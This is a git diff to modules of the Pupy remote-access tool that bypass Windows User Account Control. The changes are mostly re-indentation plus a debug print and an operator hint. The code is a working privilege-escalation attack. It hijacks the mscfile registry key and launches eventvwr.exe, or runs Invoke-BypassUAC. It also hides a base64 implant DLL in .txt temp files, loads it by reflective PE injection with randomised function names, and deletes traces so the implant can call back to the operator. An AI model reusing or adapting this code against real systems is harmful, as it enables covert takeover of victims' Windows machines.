diff --git a/pupy/modules/bypassuac.py b/pupy/modules/bypassuac.py index 01f53676..e6eb1ed2 100644 --- a/pupy/modules/bypassuac.py +++ b/pupy/modules/bypassuac.py @@ -20,30 +20,30 @@ class BypassUAC(PupyModule): self.arg_parser.add_argument('-m', dest='method', choices=["eventvwr", "dll_hijacking"], default=None, help="Default: the technic will be choosen for you. 'dll_hijacking' for wind7-8.1 and 'eventvwr' for wind7-10.") def run(self, args): - # check if a UAC Bypass can be done - if not self.client.conn.modules["pupwinutils.security"].can_get_admin_access(): - self.error('Your are not on the local administrator group.') - return + # check if a UAC Bypass can be done + if not self.client.conn.modules["pupwinutils.security"].can_get_admin_access(): + self.error('Your are not on the local administrator group.') + return - dll_hijacking = False - registry_hijacking = False + dll_hijacking = False + registry_hijacking = False - bypassUasModule = bypassuac(self, rootPupyPath=ROOT) - # choose methods depending on the OS Version - if not args.method: - if self.client.desc['release'] == '10': - registry_hijacking = True - else: - dll_hijacking = True - elif args.method == "eventvwr": - registry_hijacking = True - else: - dll_hijacking = True + bypassUasModule = bypassuac(self, rootPupyPath=ROOT) + # choose methods depending on the OS Version + if not args.method: + if self.client.desc['release'] == '10': + registry_hijacking = True + else: + dll_hijacking = True + elif args.method == "eventvwr": + registry_hijacking = True + else: + dll_hijacking = True - if registry_hijacking: - self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...") - bypassUasModule.bypassuac_through_EventVwrBypass() - elif dll_hijacking: - # Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012) - self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...") - bypassUasModule.bypassuac_through_PowerSploitBypassUAC() + if registry_hijacking: + self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...") + bypassUasModule.bypassuac_through_EventVwrBypass() + elif dll_hijacking: + # Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012) + self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...") + bypassUasModule.bypassuac_through_PowerSploitBypassUAC() diff --git a/pupy/modules/lib/windows/bypassuac.py b/pupy/modules/lib/windows/bypassuac.py index 3ba55cb9..7698725b 100644 --- a/pupy/modules/lib/windows/bypassuac.py +++ b/pupy/modules/lib/windows/bypassuac.py @@ -15,122 +15,125 @@ import random, string from pupylib.utils.rpyc_utils import redirected_stdo class bypassuac(): - - def __init__(self, module, rootPupyPath): - self.module = module - self.module.client.load_package("pupwinutils.bypassuac_remote") + + def __init__(self, module, rootPupyPath): + self.module = module + self.module.client.load_package("pupwinutils.bypassuac_remote") - #Remote paths - remoteTempFolder, systemRoot = self.module.client.conn.modules["pupwinutils.bypassuac_remote"].get_env_variables() - - self.invokeReflectivePEInjectionRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt') - self.mainPowershellScriptRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1') - self.pupyDLLRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt') - self.invokeBypassUACRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1') - - #Adding obfuscation on ps1 main function - self.bypassUAC_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7)) - self.reflectivePE_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7)) + #Remote paths + remoteTempFolder, systemRoot = self.module.client.conn.modules["pupwinutils.bypassuac_remote"].get_env_variables() + + self.invokeReflectivePEInjectionRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt') + self.mainPowershellScriptRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1') + self.pupyDLLRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt') + self.invokeBypassUACRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1') + + #Adding obfuscation on ps1 main function + self.bypassUAC_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7)) + self.reflectivePE_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7)) - #Define Local paths - self.pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt') - self.mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt') - self.invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1") - self.invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1") - - - def bypassuac_through_EventVwrBypass(self): - # ''' - # Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/) - # ''' - - # On a Windows 10 "C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe" does not exist, we cannot force to use a x64 bit powershell interpreter - # The pupy dll upload will be a 32 bit - if '64' in self.module.client.desc['proc_arch']: - upload_x86_dll = False - else: - upload_x86_dll = True - self.module.info('Uploading temporary files') - self.uploadPupyDLL(force_x86_dll=upload_x86_dll) - self.uploadPowershellScripts() - files_to_delete=[self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.pupyDLLRemotePath] - self.module.info('Altering the registry') - self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking(self.mainPowershellScriptRemotePath, files_to_delete) - - self.module.success("Waiting for a connection from the DLL (take few seconds)...") - - def bypassuac_through_PowerSploitBypassUAC(self): - ''' - Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1) - ''' - #Constants - bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath) - self.module.info('Uploading temporary files') - self.uploadPowershellScripts() - self.uploadPupyDLL() - content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I) - content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name, content, flags=re.I) - logging.debug("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd)) - self.module.info('Starting the UAC Bypass process') - output = execute_powershell_script(self.module, content, bypassUACcmd, x64IfPossible=True) - logging.debug("BypassUAC script output: %s\n"%(output)) - - if "DLL injection complete!" in output: - self.module.success("UAC bypassed") - else: - self.module.warning("Impossible to know what's happened remotely. You should active debug mode.") - - #Clean tmp files - tmp_files = [self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.invokeBypassUACRemotePath, self.pupyDLLRemotePath] - logging.debug("Deleting temporary files") - self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(tmp_files) - - #... - self.module.success("Waiting for a connection from the DLL (take few seconds)...") - - def uploadPowershellScripts(self): - ''' - Upload main powershell script and invokeReflectivePEInjection script - ''' - mainPowerShellScriptPrivileged = """ - cat {invoke_reflective_pe_injection} | Out-String | iex - cat {pupy_dll} | Out-String | iex - {InvokeReflectivePEInjection} -PEBytes $PEBytes -ForceASLR - """.format(invoke_reflective_pe_injection=self.invokeReflectivePEInjectionRemotePath, pupy_dll=self.pupyDLLRemotePath, InvokeReflectivePEInjection=self.reflectivePE_random_name) - - logging.debug("Creating the Powershell script in %s locally"%(self.mainPowerShellScriptPrivilegedLocalPath)) - with open(self.mainPowerShellScriptPrivilegedLocalPath, 'w+') as w: - w.write(mainPowerShellScriptPrivileged) - - logging.debug("Uploading powershell code for DLL injection in {0}".format(self.invokeReflectivePEInjectionRemotePath)) - content = re.sub("Invoke-ReflectivePEInjection", self.reflectivePE_random_name, open(self.invokeReflectivePEInjectionLocalPath).read(), flags=re.I) - tmp_file = os.path.join(gettempdir(),'reflective_pe.txt') - with open(tmp_file, 'w+') as w: - w.write(content) - upload(self.module.client.conn, tmp_file, self.invokeReflectivePEInjectionRemotePath) - - logging.debug("Uploading main powershell script executed by BypassUAC in {0}".format(self.mainPowershellScriptRemotePath)) - upload(self.module.client.conn, self.mainPowerShellScriptPrivilegedLocalPath, self.mainPowershellScriptRemotePath) + #Define Local paths + self.pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt') + self.mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt') + self.invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1") + self.invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1") + + + def bypassuac_through_EventVwrBypass(self): + # ''' + # Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/) + # ''' + + # On a Windows 10 "C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe" does not exist, we cannot force to use a x64 bit powershell interpreter + # The pupy dll upload will be a 32 bit + print repr(self.module.client.desc) + if '64' in self.module.client.desc['proc_arch']: + upload_x86_dll = False + else: + upload_x86_dll = True + self.module.info('Uploading temporary files') + self.uploadPupyDLL(force_x86_dll=upload_x86_dll) + self.uploadPowershellScripts() + files_to_delete=[self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.pupyDLLRemotePath] + self.module.info('Altering the registry') + self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking(self.mainPowershellScriptRemotePath, files_to_delete) + + self.module.success("Waiting for a connection from the DLL (take few seconds)...") + self.module.success("If nothing happened, try to migrate to another process and try again.") + + def bypassuac_through_PowerSploitBypassUAC(self): + ''' + Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1) + ''' + #Constants + bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath) + self.module.info('Uploading temporary files') + self.uploadPowershellScripts() + self.uploadPupyDLL() + content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I) + content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name, content, flags=re.I) + logging.debug("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd)) + self.module.info('Starting the UAC Bypass process') + output = execute_powershell_script(self.module, content, bypassUACcmd, x64IfPossible=True) + logging.debug("BypassUAC script output: %s\n"%(output)) + + if "DLL injection complete!" in output: + self.module.success("UAC bypassed") + else: + self.module.warning("Impossible to know what's happened remotely. You should active debug mode.") + + #Clean tmp files + tmp_files = [self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.invokeBypassUACRemotePath, self.pupyDLLRemotePath] + logging.debug("Deleting temporary files") + self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(tmp_files) + + #... + self.module.success("Waiting for a connection from the DLL (take few seconds)...") + self.module.success("If nothing happened, try to migrate to another process and try again.") + + def uploadPowershellScripts(self): + ''' + Upload main powershell script and invokeReflectivePEInjection script + ''' + mainPowerShellScriptPrivileged = """ + cat {invoke_reflective_pe_injection} | Out-String | iex + cat {pupy_dll} | Out-String | iex + {InvokeReflectivePEInjection} -PEBytes $PEBytes -ForceASLR + """.format(invoke_reflective_pe_injection=self.invokeReflectivePEInjectionRemotePath, pupy_dll=self.pupyDLLRemotePath, InvokeReflectivePEInjection=self.reflectivePE_random_name) + + logging.debug("Creating the Powershell script in %s locally"%(self.mainPowerShellScriptPrivilegedLocalPath)) + with open(self.mainPowerShellScriptPrivilegedLocalPath, 'w+') as w: + w.write(mainPowerShellScriptPrivileged) + + logging.debug("Uploading powershell code for DLL injection in {0}".format(self.invokeReflectivePEInjectionRemotePath)) + content = re.sub("Invoke-ReflectivePEInjection", self.reflectivePE_random_name, open(self.invokeReflectivePEInjectionLocalPath).read(), flags=re.I) + tmp_file = os.path.join(gettempdir(),'reflective_pe.txt') + with open(tmp_file, 'w+') as w: + w.write(content) + upload(self.module.client.conn, tmp_file, self.invokeReflectivePEInjectionRemotePath) + + logging.debug("Uploading main powershell script executed by BypassUAC in {0}".format(self.mainPowershellScriptRemotePath)) + upload(self.module.client.conn, self.mainPowerShellScriptPrivilegedLocalPath, self.mainPowershellScriptRemotePath) - def uploadPupyDLL(self, force_x86_dll=False): - ''' - Upload pupy dll as a txt file - ''' - res=self.module.client.conn.modules['pupy'].get_connect_back_host() - host, port = res.rsplit(':',1) - logging.debug("Address configured is %s:%s for pupy dll..."%(host,port)) - logging.debug("Looking for process architecture...") + def uploadPupyDLL(self, force_x86_dll=False): + ''' + Upload pupy dll as a txt file + ''' + res=self.module.client.conn.modules['pupy'].get_connect_back_host() + host, port = res.rsplit(':',1) + logging.debug("Address configured is %s:%s for pupy dll..."%(host,port)) + logging.debug("Looking for process architecture...") - if "64" in self.module.client.desc["os_arch"] and not force_x86_dll: - logging.debug("Target achitecture is x64, using a x64 dll") - dllbuff=pupygen.get_edit_pupyx64_dll(self.module.client.get_conf()) - else: - logging.debug("Target achitecture is x86, using a x86 dll") - dllbuff=pupygen.get_edit_pupyx86_dll(self.module.client.get_conf()) - - logging.debug("Creating the pupy dll in %s locally"%(self.pupyDLLLocalPath)) - with open(self.pupyDLLLocalPath, 'w+') as w: - w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff))) - - logging.debug("Uploading pupy dll in {0}".format(self.pupyDLLRemotePath)) - upload(self.module.client.conn, self.pupyDLLLocalPath, self.pupyDLLRemotePath) + if "64" in self.module.client.desc["os_arch"] and not force_x86_dll: + logging.debug("Target achitecture is x64, using a x64 dll") + dllbuff=pupygen.get_edit_pupyx64_dll(self.module.client.get_conf()) + else: + logging.debug("Target achitecture is x86, using a x86 dll") + dllbuff=pupygen.get_edit_pupyx86_dll(self.module.client.get_conf()) + + logging.debug("Creating the pupy dll in %s locally"%(self.pupyDLLLocalPath)) + with open(self.pupyDLLLocalPath, 'w+') as w: + w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff))) + + logging.debug("Uploading pupy dll in {0}".format(self.pupyDLLRemotePath)) + upload(self.module.client.conn, self.pupyDLLLocalPath, self.pupyDLLRemotePath) diff --git a/pupy/packages/windows/all/pupwinutils/bypassuac_remote.py b/pupy/packages/windows/all/pupwinutils/bypassuac_remote.py index 71e0f051..56ce6f58 100644 --- a/pupy/packages/windows/all/pupwinutils/bypassuac_remote.py +++ b/pupy/packages/windows/all/pupwinutils/bypassuac_remote.py @@ -4,51 +4,51 @@ import subprocess from _winreg import * def deleteTHisRemoteFile(tmp_files): - for file in tmp_files: - try: - os.remove(file) - except Exception, e: - pass + for file in tmp_files: + try: + os.remove(file) + except Exception, e: + pass def get_env_variables(): - try: - tmp = os.path.expandvars("%TEMP%") - except: - tmp = os.path.expandvars("%APPDATA%") - - sysroot = os.path.expandvars("%SYSTEMROOT%") - - return tmp, sysroot + try: + tmp = os.path.expandvars("%TEMP%") + except: + tmp = os.path.expandvars("%APPDATA%") + + sysroot = os.path.expandvars("%SYSTEMROOT%") + + return tmp, sysroot def registry_hijacking(mainPowershellScriptRemotePath, files_to_delete): - # ''' - # Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/) - # ''' - HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) - powershellPath = '%s\\system32\\WindowsPowerShell\\v1.0\\powershell.exe' % os.path.expandvars("%SYSTEMROOT%") - mscCmdPath = "Software\Classes\mscfile\shell\open\command" - cmd = "{1} -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath, powershellPath) - - try: - # The registry key already exist in HKCU, altering... - key = OpenKey(HKCU, mscCmdPath, KEY_SET_VALUE) - except: - # Adding the registry key in HKCU - key = CreateKey(HKCU, mscCmdPath) + # ''' + # Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/) + # ''' + HKCU = ConnectRegistry(None, HKEY_CURRENT_USER) + powershellPath = '%s\\system32\\WindowsPowerShell\\v1.0\\powershell.exe' % os.path.expandvars("%SYSTEMROOT%") + mscCmdPath = "Software\Classes\mscfile\shell\open\command" + cmd = "{1} -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath, powershellPath) + + try: + # The registry key already exist in HKCU, altering... + key = OpenKey(HKCU, mscCmdPath, KEY_SET_VALUE) + except: + # Adding the registry key in HKCU + key = CreateKey(HKCU, mscCmdPath) - registry_key = OpenKey(HKCU, mscCmdPath, 0, KEY_WRITE) - SetValueEx(registry_key, '', 0, REG_SZ, cmd) - CloseKey(registry_key) - - # Executing eventvwr.exe - eventvwrPath = os.path.join(os.environ['WINDIR'],'System32','eventvwr.exe') - output = subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True) + registry_key = OpenKey(HKCU, mscCmdPath, 0, KEY_WRITE) + SetValueEx(registry_key, '', 0, REG_SZ, cmd) + CloseKey(registry_key) + + # Executing eventvwr.exe + eventvwrPath = os.path.join(os.environ['WINDIR'],'System32','eventvwr.exe') + output = subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True) - # Sleeping 5 secds... - time.sleep(5) - - #Clean everything - DeleteKey(HKCU, mscCmdPath) - deleteTHisRemoteFile(files_to_delete) - \ No newline at end of file + # Sleeping 5 secds... + time.sleep(5) + + #Clean everything + DeleteKey(HKCU, mscCmdPath) + deleteTHisRemoteFile(files_to_delete) +